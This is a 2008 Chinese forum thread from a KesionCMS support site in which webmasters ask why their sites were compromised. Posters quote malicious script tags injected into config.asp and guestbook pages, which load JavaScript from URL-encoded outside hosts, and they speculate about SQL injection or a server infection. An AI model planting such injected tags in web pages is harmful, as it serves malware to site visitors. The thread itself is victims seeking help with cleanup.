账号通
    

账号  

密码  

4760

查看

12

回复
主题:网站又被恶意挂马,不知道是何因 [收藏主题] 转到:  
rawell 当前离线

36

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:447 分
登录次数:28 次
注册时间:2007/2/9
最后登录:2013/5/21
rawell 发表于:2008/9/11 23:38:00   | 只看该作者 查看该作者主题 楼主 
科汛在线网校系统
我用的是kesionV4.5这个版本,首页打开360拦到http://w.b2c3.cn/swf.htm(不要点,有毒)恶意网址
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
rawell 当前离线

36

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:447 分
登录次数:28 次
注册时间:2007/2/9
最后登录:2013/5/21
rawell 发表于:2008/9/13 16:34:00   | 只看该作者 查看该作者主题 沙发 
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
科汛官方 当前离线

47268

主题

145

广播

405

粉丝
添加关注
级别:管理员

用户积分:101604 分
登录次数:7935 次
注册时间:2006/12/7
最后登录:2023/12/14
科汛官方 发表于:2008/9/27 8:40:00   | 只看该作者 查看该作者主题 藤椅 
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
鲁虺 当前离线

1

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:215 分
登录次数:3 次
注册时间:2008/9/27
最后登录:2010/4/3
鲁虺 发表于:2008/9/27 2:34:00   | 只看该作者 查看该作者主题 板凳 
科汛在线商城系统(NET)

  交谈中请勿轻信汇款、中奖消息,勿轻易拨打陌生电话。


虺客♂℡  02:02:58
 61.191.55.46 服务器 http://www.luhui.net又被谁挂了这个 <script language=javascript src=http://%77%2E%65%35%78%38%2E%63%6F%6D/js.js></script>


%77%2E%65%35%78%38%2E%63%6F%6D 这段代码是 w.e5x8.com



仔细检查了一下,发现被SQL注入了代码,
这是因为服务器中毒了,病毒可能是通过搜索磁盘上的文件并将病毒代码插入文件中


如果文件中没有病毒代码,就是跟IIS有关了,找服务器提供上解决。
技术支持  02:04:08
您这个 是被盗练了吧
虺客♂℡  02:04:23
没有。
虺客♂℡  02:05:21
.html静态文件好多都被挂了这样的代码
技术支持  02:07:14
我怎么没发现
虺客♂℡  02:10:16
 已经成功被SQL注入3次了,不知道人家是怎么做到的~~》。 偶已经用ASP[批量清马器-清除别人的网马]了。
虺客♂℡  02:16:25
 不找到根源以后还会发生类似事件~~~。烦死了。网上也没有现成的办法 。


http://218.22.123.146/web_monitor_config.htm

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
rawell 当前离线

36

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:447 分
登录次数:28 次
注册时间:2007/2/9
最后登录:2013/5/21
rawell 发表于:2008/9/12 22:09:00   | 只看该作者 查看该作者主题 报纸 
科汛在线商城系统(NET)
以下是引用56look在2008-9-12 18:08:00的发言:
可以找下查网站木马的软件

我是租用网上的虚拟主机,如何查?

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
56look 当前离线

807

主题

26

广播

12

粉丝
添加关注
级别:七年级

用户积分:5898 分
登录次数:575 次
注册时间:2007/3/25
最后登录:2020/3/29
56look 发表于:2008/9/12 18:08:00   | 只看该作者 查看该作者主题 地板 
科汛智能建站系统
可以找下查网站木马的软件
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
bbswing 当前离线

214

主题

0

广播

0

粉丝
添加关注
级别:二年级

用户积分:1979 分
登录次数:104 次
注册时间:2008/4/23
最后登录:2014/10/23
bbswing 发表于:2008/9/12 2:38:00   | 只看该作者 查看该作者主题 7楼 
做在线知识付费 选科汛云开店

这是因为服务器中毒了,病毒可能是通过搜索磁盘上的文件并将病毒代码插入文件中

如果文件中没有病毒代码,就是跟IIS有关了,找服务器提供上解决。

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
rawell 当前离线

36

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:447 分
登录次数:28 次
注册时间:2007/2/9
最后登录:2013/5/21
rawell 发表于:2008/9/12 1:09:00   | 只看该作者 查看该作者主题 8楼 

频道栏目页的恶意代码就是发现不了在哪个文件,不知哪位能提供一下思路不?

 

Article文件夹中每个文件我都下下来看了,没有发现恶意代码。这个频道栏目页的恶意代码来自哪儿呢?

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
rawell 当前离线

36

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:447 分
登录次数:28 次
注册时间:2007/2/9
最后登录:2013/5/21
rawell 发表于:2008/9/12 0:59:00   | 只看该作者 查看该作者主题 9楼 
科汛在线商城系统(NET)

guestbook中的index.asp也被挂马:

 

<script language=javascript src=http://%77%2E%65%35%78%38%2E%63%6F%6D/js.js></script>

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
rawell 当前离线

36

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:447 分
登录次数:28 次
注册时间:2007/2/9
最后登录:2013/5/21
rawell 发表于:2008/9/12 0:48:00   | 只看该作者 查看该作者主题 10楼 
科汛智能建站系统

config.asp也被注入:

 

<script language=javascript src=http://%77%77%2E%78%6E%69%62%69%2E%63%6F%6D/js.js></script><script language=javascript src=http://%77%2E%65%35%78%38%2E%63%6F%6D/js.js></script>

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
<上一主题 | 下一主题 >
Powered By KesionCMS Version X1
厦门科汛软件有限公司 © 2006-2016 页面执行0.18750秒 powered by KesionCMS 9.0